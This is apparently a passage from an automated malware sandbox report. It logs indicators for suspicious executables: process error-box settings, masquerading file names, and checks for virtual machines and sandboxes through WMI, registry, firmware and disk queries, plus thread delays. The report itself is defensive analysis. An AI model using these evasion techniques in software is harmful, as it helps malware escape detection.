                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries memory information (via WMI often done to detect virtual machines)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PortConnector
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PortConnector
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PortConnector
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exeSystem information queried: FirmwareTableInformation
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeAPI/Special instruction interceptor: Address: 7FFCC372D044
                      Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCC372D044
                      Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 571B83A
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeMemory allocated: E30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeMemory allocated: 1AB70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeMemory allocated: 13E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeMemory allocated: 1AE50000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3491Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 425Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6710Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2908Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7960
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1728
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeWindow / User API: threadDelayed 4242
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3904
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3066
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2868
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1358
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2891
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 908
